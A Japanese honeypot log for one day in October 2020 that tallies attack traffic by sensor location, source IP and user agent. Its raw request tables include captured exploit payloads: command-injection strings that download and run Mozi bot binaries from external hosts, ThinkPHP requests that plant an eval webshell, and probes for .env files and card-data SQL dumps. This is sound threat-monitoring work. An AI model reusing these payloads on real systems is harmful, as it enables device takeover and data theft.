ハニーポット(仮) 観測記録 2020/10/23分です。
特徴
Location:JP
Adobe ColdFusionの脆弱性を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
bitdiscoveryによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
.sqlへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.172.111.214/bins/UnHAnaAW.x86; chmod 777 /tmp/UnHAnaAW.x86; sh /tmp/UnHAnaAW.x86 w00dy.jaws
cd /tmp; rm -rf *; wget http[:]//118[.]233[.]63[.]194:57259/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:169 (前日比:+111)
US:総アクセス数:81 (前日比:+57)
UK:総アクセス数:50 (前日比:+20)
SG:総アクセス数:100 (前日比:+55)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 23.90.145.36 | United States |
1 | 24.42.13.165 | United States |
1 | 40.76.33.107 | United States |
1 | 40.117.38.175 | United States |
1 | 45.76.13.209 | United States |
1 | 45.148.121.85 | Netherlands |
1 | 47.52.72.22 | United States |
1 | 52.252.60.3 | United States |
1 | 60.190.248.12 | China |
1 | 61.219.11.153 | Taiwan |
1 | 62.211.116.63 | Italy |
1 | 62.232.253.90 | United Kingdom |
1 | 65.23.182.30 | United States |
1 | 68.252.246.33 | United States |
1 | 71.104.51.194 | United States |
1 | 84.229.232.20 | Israel |
1 | 84.238.140.107 | Bulgaria |
1 | 85.105.74.126 | Turkey |
1 | 94.200.76.222 | United Arab Emirates |
1 | 95.134.20.169 | Ukraine |
1 | 115.238.44.237 | China |
1 | 129.146.99.134 | United States |
101 | 166.249.140.243 | United States |
1 | 173.23.22.93 | United States |
1 | 185.39.11.105 | Switzerland |
29 | 185.216.140.192 | Netherlands |
1 | 187.199.178.222 | Mexico |
1 | 188.165.171.24 | France |
1 | 188.166.242.78 | Netherlands |
1 | 189.213.164.253 | Mexico |
1 | 189.226.86.229 | Mexico |
1 | 192.241.211.249 | United States |
6 | 193.27.229.26 | Russia |
1 | 193.118.53.202 | Germany |
1 | 193.239.147.184 | Brunei |
1 | 222.141.151.170 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
12 | ApiTool |
1 | Java/1.8.0_261 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
2 | curl/7.58.0 |
29 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x16\x03\x01 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | CONNECT | discord[.]com/:443 | HTTP/1.1 |
2 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.0 |
1 | CONNECT | www[.]google[.]com/:443 | HTTP/1.1 |
4 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/ | HTTP/1.1 |
2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /PHPMYADMIN/scripts/setup.php | HTTP/1.1 |
1 | GET | /api/v1/contract_api_state?symbol=BTC | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /database/scripts/setup.php | HTTP/1.1 |
1 | GET | /db/scripts/setup.php | HTTP/1.1 |
1 | GET | /dbadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /my/scripts/setup.php | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysql/scripts/setup.php | HTTP/1.1 |
1 | GET | /mysqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pHpMyAdMiN/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-2.10.0.0/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-2.11.11.3/scripts/setup.ph | HTTP/1.1 |
1 | GET | /phpMyAdmin-2.11.11/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-2/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/db.init.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpadmin/scripts/setup.php | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/db.init.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin1/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin2/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /scripts/setup.php | HTTP/1.1 |
1 | GET | /setup.php | HTTP/1.1 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sqladm/scripts/setup.php | HTTP/1.1 |
1 | GET | /sqladmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
12 | POST | /editBlackAndWhiteList | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.206.50 | Russia |
1 | 40.121.45.150 | United States |
1 | 41.75.111.50 | South Africa |
1 | 60.243.7.157 | India |
1 | 61.219.11.153 | Taiwan |
1 | 66.240.205.34 | United States |
1 | 76.217.88.45 | United States |
1 | 94.232.41.116 | Russia |
1 | 103.223.9.36 | India |
19 | 119.188.240.46 | China |
1 | 121.149.171.210 | South Korea |
2 | 128.199.124.115 | United Kingdom |
6 | 163.172.168.251 | United Kingdom |
2 | 169.45.99.54 | United States |
1 | 182.117.49.30 | China |
2 | 185.39.11.105 | Switzerland |
1 | 189.252.50.227 | Mexico |
1 | 192.241.237.93 | United States |
1 | 192.241.237.183 | United States |
13 | 193.27.229.26 | Russia |
1 | 193.118.53.194 | Germany |
1 | 193.118.53.210 | Germany |
1 | 193.239.147.184 | Brunei |
14 | 195.5.246.162 | France |
1 | 195.93.250.52 | Poland |
1 | 201.145.167.253 | Mexico |
1 | 202.177.244.68 | India |
1 | 220.133.25.88 | Taiwan |
1 | 222.137.175.184 | China |
1 | 222.247.7.207 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
7 | ApiTool |
1 | Go-http-client/1.1 |
3 | Hello, World |
2 | Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
19 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | Gh0st\xad | ||
2 | \x03 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
2 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
2 | GET | /.env | HTTP/1.1 |
1 | GET | ///shell.php | HTTP/1.1 |
1 | GET | //console/login/LoginForm.jsp | HTTP/1.1 |
1 | GET | //dede/tpl.php | HTTP/1.1 |
1 | GET | //index.php | HTTP/1.1 |
1 | GET | //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=shell.php&vars%5B1%5D%5B%5D=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 | HTTP/1.1 |
1 | GET | //index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CRequest/input&filter=phpinfo&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5CRequest/input&filter=system&data=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=shell.php&content=%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22 | HTTP/1.1 |
1 | GET | //index.php/?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&content=echo%20%22%3C?php%20@eval($_POST%5Bshell%5D);?%3E%22%20%3E%3Eshell.php | HTTP/1.1 |
1 | GET | //login.action | HTTP/1.1 |
1 | GET | //public/index.php | HTTP/1.1 |
1 | GET | //showAnouncement.action | HTTP/1.1 |
1 | GET | //showcase.action | HTTP/1.1 |
1 | GET | //upload.action | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
14 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /hudson | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
2 | GET | /k/PuK | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//121[.]149[.]171[.]210:45946/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /solr/ | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /webfig/ | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
2 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | //index.php/?s=captcha | HTTP/1.1 |
3 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
7 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//allisonhayden[.]xyz/9c14fde1be2ef92b1e948837700d136531281980cabd4c951521285057ddf125c4c418234ec87bd41a7403014fed2ae124efd5cdebb44178e60d5398f48de1ed0e76fdb90f741719f087acca257050385bd6a9d0aed57b86bcc0af346cc52daf | HTTP/1.1 |
1 | POST | http[:]//cisza[.]website/5a18a7d00b4da36eeef6b138b3f4ed276e8b9f0d907c01d3124c36efc863141d86852c03e4fbcce78bb1280bd0ec4bd2415fcb9acf2cfcf606646e5bad107407a94748eccb0cd606fa90f710f4269e2692c5982c2cd6e96e4ae0a7bb3201089b | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.124.47.28 | Singapore |
1 | 27.215.161.172 | China |
1 | 45.148.121.85 | Netherlands |
1 | 49.49.250.46 | Thailand |
1 | 49.143.32.6 | South Korea |
1 | 59.177.37.68 | India |
1 | 60.52.124.238 | Malaysia |
1 | 60.191.125.35 | China |
1 | 61.219.11.153 | Taiwan |
4 | 66.240.219.146 | United States |
1 | 80.82.70.118 | Netherlands |
1 | 86.98.13.33 | United Arab Emirates |
1 | 99.1.237.68 | United States |
1 | 103.223.8.17 | India |
1 | 104.131.5.124 | United States |
1 | 109.100.190.15 | Romania |
1 | 114.229.173.254 | China |
2 | 115.87.199.122 | Thailand |
1 | 122.202.50.129 | South Korea |
1 | 172.105.77.209 | United States |
1 | 173.52.65.6 | United States |
10 | 178.128.43.252 | Netherlands |
1 | 185.39.11.105 | Switzerland |
1 | 188.26.7.21 | Romania |
1 | 192.241.234.214 | United States |
8 | 193.27.229.26 | Russia |
1 | 193.118.53.194 | Germany |
1 | 193.239.147.184 | Brunei |
1 | 194.44.41.0 | Ukraine |
1 | 213.230.109.103 | Uzbekistan |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
8 | ApiTool |
1 | Go-http-client/1.1 |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
2 | \x16\x03\x01 | ||
1 | \x16\x03\x01\x01\x04\x01 | ||
1 | \x16\x03\x02\x01o\x01 | ||
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /0bef | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /api.php | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp | HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /client_area/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.html | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /login.php | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /stalker_portal/c/ | HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js | HTTP/1.1 |
1 | GET | /streaming | HTTP/1.1 |
1 | GET | /streaming/43u4SgudzH.php | HTTP/1.1 |
2 | GET | /streaming/clients_live.php | HTTP/1.1 |
1 | GET | /system_api.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
8 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 24.90.70.40 | United States |
1 | 45.148.121.85 | Netherlands |
1 | 61.219.11.153 | Taiwan |
1 | 68.150.109.112 | Canada |
1 | 85.74.214.148 | Greece |
1 | 90.180.217.217 | Czechia |
1 | 94.20.64.42 | Azerbaijan |
1 | 94.200.76.222 | United Arab Emirates |
1 | 104.131.5.124 | United States |
1 | 115.58.22.27 | China |
1 | 118.233.63.194 | Taiwan |
1 | 159.18.94.65 | Canada |
1 | 182.119.59.132 | China |
1 | 185.39.11.105 | Switzerland |
72 | 185.153.196.226 | Russia |
1 | 192.241.236.146 | United States |
8 | 193.27.229.26 | Russia |
1 | 193.118.53.194 | Germany |
1 | 193.239.147.184 | Brunei |
1 | 201.145.105.106 | Mexico |
1 | 201.171.217.219 | Mexico |
1 | 209.126.151.123 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
5 | ApiTool |
2 | Hello, world |
72 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2969.56 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
2 | XTC |
1 | bitdiscovery |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x16\x03\x01\x01\x04\x01 | ||
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /backup/order.sql | HTTP/1.1 |
1 | GET | /backup/orders.sql | HTTP/1.1 |
1 | GET | /backup/payment.sql | HTTP/1.1 |
1 | GET | /backup/payments.sql | HTTP/1.1 |
1 | GET | /backup/shop.sql | HTTP/1.1 |
1 | GET | /backup/store.sql | HTTP/1.1 |
1 | GET | /backups/order.sql | HTTP/1.1 |
1 | GET | /backups/orders.sql | HTTP/1.1 |
1 | GET | /backups/payment.sql | HTTP/1.1 |
1 | GET | /backups/payments.sql | HTTP/1.1 |
1 | GET | /backups/shop.sql | HTTP/1.1 |
1 | GET | /backups/store.sql | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
1 | GET | /card.sql | HTTP/1.1 |
1 | GET | /cards.sql | HTTP/1.1 |
1 | GET | /credit_card.sql | HTTP/1.1 |
1 | GET | /credit_cards.sql | HTTP/1.1 |
1 | GET | /creditcard.sql | HTTP/1.1 |
1 | GET | /creditcards.sql | HTTP/1.1 |
1 | GET | /database/order.sql | HTTP/1.1 |
1 | GET | /database/orders.sql | HTTP/1.1 |
1 | GET | /database/payment.sql | HTTP/1.1 |
1 | GET | /database/payments.sql | HTTP/1.1 |
1 | GET | /database/shop.sql | HTTP/1.1 |
1 | GET | /database/store.sql | HTTP/1.1 |
1 | GET | /db/order.sql | HTTP/1.1 |
1 | GET | /db/orders.sql | HTTP/1.1 |
1 | GET | /db/payment.sql | HTTP/1.1 |
1 | GET | /db/payments.sql | HTTP/1.1 |
1 | GET | /db/shop.sql | HTTP/1.1 |
1 | GET | /db/store.sql | HTTP/1.1 |
1 | GET | /dbbackup/order.sql | HTTP/1.1 |
1 | GET | /dbbackup/orders.sql | HTTP/1.1 |
1 | GET | /dbbackup/payment.sql | HTTP/1.1 |
1 | GET | /dbbackup/payments.sql | HTTP/1.1 |
1 | GET | /dbbackup/shop.sql | HTTP/1.1 |
1 | GET | /dbbackup/store.sql | HTTP/1.1 |
1 | GET | /dump/order.sql | HTTP/1.1 |
1 | GET | /dump/orders.sql | HTTP/1.1 |
1 | GET | /dump/payment.sql | HTTP/1.1 |
1 | GET | /dump/payments.sql | HTTP/1.1 |
1 | GET | /dump/shop.sql | HTTP/1.1 |
1 | GET | /dump/store.sql | HTTP/1.1 |
1 | GET | /dumps/order.sql | HTTP/1.1 |
1 | GET | /dumps/orders.sql | HTTP/1.1 |
1 | GET | /dumps/payment.sql | HTTP/1.1 |
1 | GET | /dumps/payments.sql | HTTP/1.1 |
1 | GET | /dumps/shop.sql | HTTP/1.1 |
1 | GET | /dumps/store.sql | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /mysql/order.sql | HTTP/1.1 |
1 | GET | /mysql/orders.sql | HTTP/1.1 |
1 | GET | /mysql/payment.sql | HTTP/1.1 |
1 | GET | /mysql/payments.sql | HTTP/1.1 |
1 | GET | /mysql/shop.sql | HTTP/1.1 |
1 | GET | /mysql/store.sql | HTTP/1.1 |
1 | GET | /mysql_backup/order.sql | HTTP/1.1 |
1 | GET | /mysql_backup/orders.sql | HTTP/1.1 |
1 | GET | /mysql_backup/payment.sql | HTTP/1.1 |
1 | GET | /mysql_backup/payments.sql | HTTP/1.1 |
1 | GET | /mysql_backup/shop.sql | HTTP/1.1 |
1 | GET | /mysql_backup/store.sql | HTTP/1.1 |
1 | GET | /order.sql | HTTP/1.1 |
1 | GET | /orders.sql | HTTP/1.1 |
1 | GET | /payment.sql | HTTP/1.1 |
1 | GET | /payments.sql | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//118[.]233[.]63[.]194:57259/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shop.sql | HTTP/1.1 |
1 | GET | /solr/ | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sql/order.sql | HTTP/1.1 |
1 | GET | /sql/orders.sql | HTTP/1.1 |
1 | GET | /sql/payment.sql | HTTP/1.1 |
1 | GET | /sql/payments.sql | HTTP/1.1 |
1 | GET | /sql/shop.sql | HTTP/1.1 |
1 | GET | /sql/store.sql | HTTP/1.1 |
1 | GET | /store.sql | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | HEAD | / | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | OPTIONS | * | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
5 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |